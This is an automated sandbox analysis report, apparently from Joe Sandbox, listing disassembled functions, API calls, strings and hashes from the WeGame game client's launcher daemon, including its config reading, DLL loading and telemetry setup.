                                                                • String ID: "$--debug$-launcher=$-multi_launcher=$31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$[CleanCache] need clean page cache.$[Launcher]Command line game_id not find.$[Launcher]Command line version not find.$[Launcher]Launcher info: %s$[Launcher]Launcher parser fail: %s$[Launcher]No launcher info.$[Launcher]Parser launcher command json fail.$[Sys_wrapper]initialize COM library. Error code = %x$[main] wegame already exist.$[main]WeGame is in tool mode.$[main]get and set cmd info from cmd_start_info successfully$[wegame_launch][step1]Main start.$[wegame_launch][step2]App inited.$_TGP_EXISTS_MUTEX_NAME_$app inited$begin...$debug$delete_qb_cookies.txt$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$game_id$ierd_tgp_daemon.exe$launcher_ver$main_start$multi_launcher$normal end.$offline$offline=$stamp_record$start_from_host$uin=$wegame.exe$wegamex.exe
                                                                • API String ID: 2984307730-4208083574
                                                                • Opcode ID: 52894d3455789ef75202132d115b2645bdd3ed81e565e35c723dbefde086fa4b
                                                                • Instruction ID: e0f0a2ea875c3265d971df5443fe06ced1f2baabbfa0af9c8d14cb022d3b9553
                                                                • Opcode Fuzzy Hash: 52894d3455789ef75202132d115b2645bdd3ed81e565e35c723dbefde086fa4b
                                                                • Instruction Fuzzy Hash: 3DA2E870E00248EEDF15EBA5CC55BEEB7B4AF15308F60409EE04577282EB785E45CB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462960 Relevance: 66.8, APIs: 24, Strings: 14, Instructions: 342libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 726 462960-462b42 call 46e476 memset ?instance@Application@common@ierd_tgp@@SAPAV123@XZ ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z GetPrivateProfileStringW memset GetPrivateProfileStringW call 40bf40 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z call 40bbd0 call 40bf40 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z call 40bbd0 call 46729c 739 462b44-462b5c call 46176a 726->739 740 462b7f-462b88 ?get_log_instance@base@@YAPAVILogger@1@XZ 726->740 746 462b70-462b7a call 420c80 739->746 747 462b5e-462b6b call 43a750 739->747 742 462c02-462d23 call 464261 ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z call 461579 call 40d190 call 40bbd0 call 40d190 ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z call 40bbd0 ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z PathFileExistsW 740->742 743 462b8a-462b97 740->743 768 462d25-462d5f call 4515c5 call 4460a1 call 420c80 742->768 769 462d61-462d6e call 420e50 742->769 743->742 753 462b99-462bfd call 43df1b call 43f4bb call 43e231 743->753 746->740 747->746 753->742 773 462d73-462d80 PathFileExistsA 768->773 769->773 775 462d82-462d8b call 45f9d2 773->775 776 462d90-462e26 ?instance@Application@common@ierd_tgp@@SAPAV123@XZ call 436180 ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z LoadLibraryW 773->776 775->776 782 462e95-462f11 call 40bbd0 call 420c80 call 40bbd0 call 420c80 call 40bbd0 call 420c80 * 2 call 40bbd0 call 46e420 776->782 783 462e28-462e36 GetProcAddress 776->783 783->782 785 462e38-462e45 ?get_log_instance@base@@YAPAVILogger@1@XZ 783->785 785->782 791 462e47-462e54 785->791 791->782 796 462e56-462e90 call 43df1b call 43f4bb call 43e231 791->796 796->782
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046296A
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 0046297F
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 00462984
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,00000000,00000208,00000554,004651BB,00000070,0045A152), ref: 00462990
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(cfg_data.ini), ref: 004629A7
                                                                • GetPrivateProfileStringW.KERNEL32(qblink_path,platform_dir,QBBlink,?,00000104,?), ref: 004629E3
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 004629F3
                                                                • GetPrivateProfileStringW.KERNEL32(qblink_path,plugin_dir,QBBlink,?,00000104,?), ref: 00462A27
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462AA4
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00462ABB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462B03
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00462B1A
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?), ref: 00462B7F
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?), ref: 00462C4E
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,?,?,?,?,?,cfg_data.ini), ref: 00462CE2
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 00462D01
                                                                • PathFileExistsW.SHLWAPI(?), ref: 00462D1B
                                                                  • Part of subcall function 0046176A: __EH_prolog3_GS.LIBCMT ref: 00461774
                                                                  • Part of subcall function 0046176A: ?GetUpdatedFilePath@silence_update@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PB_W0@Z.COMMON(?,qblink_update,browser.exe,00000104,00462B52,?), ref: 004617B2
                                                                  • Part of subcall function 0046176A: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,cfg_data.ini), ref: 004617C7
                                                                  • Part of subcall function 0046176A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00461850
                                                                  • Part of subcall function 0046176A: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?), ref: 00461871
                                                                  • Part of subcall function 0046176A: ?remove_filename@path@filesystem@ierd_tgp@@QAEAAV123@XZ.COMMON(00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,0000060D,0048BBC7), ref: 00461882
                                                                • PathFileExistsA.SHLWAPI(c:\wgdebug.txt,QBBlink\qbclient.dll,00000014), ref: 00462D78
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(?), ref: 00462D90
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,?,?,?,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 00462DC1
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00462E01
                                                                • LoadLibraryW.KERNEL32(?), ref: 00462E1E
                                                                • GetProcAddress.KERNEL32(00000000,Prefetch), ref: 00462E2E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00462E3C
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_log_instance@base@@?u8to16@common@ierd_tgp@@FileLogger@1@V012@V123@W@2@@4@@$?instance@?u16to8@common@ierd_tgp@@D@2@@4@@ExistsH_prolog3_PathPrivateProfileSimpleStringString::operator=W@2@@std@@_invalid_parameter_noinfo_noreturnmemset$?exists@filesystem@ierd_tgp@@?get_app_sub_path@?get_workingdir_path_ex@?remove_filename@path@filesystem@ierd_tgp@@AddressLibraryLoadPath@silence_update@common@ierd_tgp@@ProcUpdatedV012@@V45@@Vpath@12@@Vpath@filesystem@3@memmove
                                                                • String ID: Prefetch$QBBlink$QBBlink$QBBlink\qbclient.dll$[QBlink]read qblink_path, platform:[%s], plugin:[%s]$[main]PrefetchQblink$\qbclient.dll$c:\wgdebug.txt$cfg_data.ini$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$platform_dir$plugin_dir$qbclient.dll$qblink_path
                                                                • API String ID: 1375377618-3187658631
                                                                • Opcode ID: 27f24b3e9a96e7f8efa9b1c6fc2e99f4335258d9aef33d017a419c4e218c65f2
                                                                • Instruction ID: 6e1272fa859d3cee3c37fde7b3fadde1d2451568f92be43ec0aeb7dbfe72c68a
                                                                • Opcode Fuzzy Hash: 27f24b3e9a96e7f8efa9b1c6fc2e99f4335258d9aef33d017a419c4e218c65f2
                                                                • Instruction Fuzzy Hash: 69F144B0D012589ADB60EB55CC95BDDB7B8AF14308F5044EEE209A7182EB785F84CF6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00464392 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 260COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 813 464392-4643de call 46e4e4 call 45907a call 420e50 819 4643e3-464401 ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z call 420c80 813->819 821 464406-464408 819->821 822 4644a5 821->822 823 46440e-464427 call 453d50 821->823 825 4644a7-4644f6 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 46a091 ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 822->825 823->825 829 4644fb-464567 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 420e50 ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 825->829 835 46456c-4645cc ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_client_id@util_client_info@ierd_tgp@@YAHXZ ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ call 454452 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 46bff0 829->835 839 4645d1-464615 ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 call 420e50 835->839 843 46461a-464622 call 453fd5 839->843 845 464627-464657 call 420e50 843->845 847 46465c-464664 call 453fd5 845->847 849 464669-464675 847->849 850 464677-4646d8 ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ call 46c98b call 45db69 call 40bbd0 * 3 849->850 851 4646dd-464731 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z call 420e50 849->851 850->851 855 464736-464789 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z call 420c80 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z call 420c80 call 45b9bc call 46e431 851->855
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0046439C
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,qos.id,00000006,?,?,?,?,?,000000EC,00459F4F), ref: 004643F0
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004644A7
                                                                • ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z.COMMON(00000B57), ref: 004644AF
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000B57), ref: 004644B4
                                                                • ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z.COMMON(00000000), ref: 004644CE
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004644D3
                                                                • ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000000), ref: 004644DE
                                                                • ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,00000000), ref: 004644EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,00000000), ref: 004644FB
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046452E
                                                                • ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046453E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464543
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464550
                                                                • ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046455C
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046456C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464573
                                                                • ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046457B
                                                                • ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464580
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004645A9
                                                                • ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 004645B4
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 004645B9
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?), ref: 004645C0
                                                                • ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?), ref: 004645DA
                                                                  • Part of subcall function 00453D50: __EH_prolog3.LIBCMT ref: 00453D57
                                                                  • Part of subcall function 00453D50: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008), ref: 00453D6E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                  • Part of subcall function 00453FD5: __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 00453FD5: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                  • Part of subcall function 00453FD5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 00420E50: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00420F68
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 0046467E
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 0046468E
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 0045DB69: __EH_prolog3_GS.LIBCMT ref: 0045DB70
                                                                  • Part of subcall function 0045DB69: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050,004646AC,00000000,?,?), ref: 0045DBA0
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?), ref: 004646DD
                                                                • ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z.COMMON(00000000), ref: 004646EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004646F0
                                                                • ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z.COMMON(?,00000000), ref: 0046470D
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464745
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(StartFor,00000008,?,00000000), ref: 00464758
                                                                • ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@$D@2@@std@@$D@2@@std@@@$Application@common@ierd_tgp@@$H_prolog3_invalid_parameter_noinfo_noreturn$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_LastLogger@1@LoginedU?$less@V12@V?$basic_ptree@memmove$?extract_op_from_cmd@?get_client_id@util_client_info@ierd_tgp@@?get_exe_path_ex@?get_machine_id@?get_session_id@?parent_path@path@filesystem@ierd_tgp@@?set_account_id@?set_bind_game_id@?set_channel_id@?set_client_version_type@?set_machine_guid_async@?set_machine_id@?set_qm_report_guid@?set_qos_id@?set_session_id@?set_uid@?set_ver@H_prolog3_catch_Id@common@ierd_tgp@@Init@locale@std@@Locimp@12@_StartSys_wrapper@common@ierd_tgp@@Uin@common@ierd_tgp@@Uversion_t@common@4@@V123@Vpath@filesystem@3@Wegame
                                                                • String ID: StartFor$initial.bind_by_game.channel_id$initial.bind_by_game.game_id$qos.id
                                                                • API String ID: 1635971299-2812686160
                                                                • Opcode ID: 11b83cd9c88deff170b7a745d753ca8c254e961404a93b54664c8c1149cf9881
                                                                • Instruction ID: c91c23193e0abaf9e6793cae274ba5bbd8d2589a74ad653bb9fc44fbfc9641b4
                                                                • Opcode Fuzzy Hash: 11b83cd9c88deff170b7a745d753ca8c254e961404a93b54664c8c1149cf9881
                                                                • Instruction Fuzzy Hash: EDA18371D00258DADB14EFBAC8517DDBBB46F14308F54849FE009B7282EB794B49CB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00464492 Relevance: 59.7, APIs: 31, Strings: 3, Instructions: 222COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
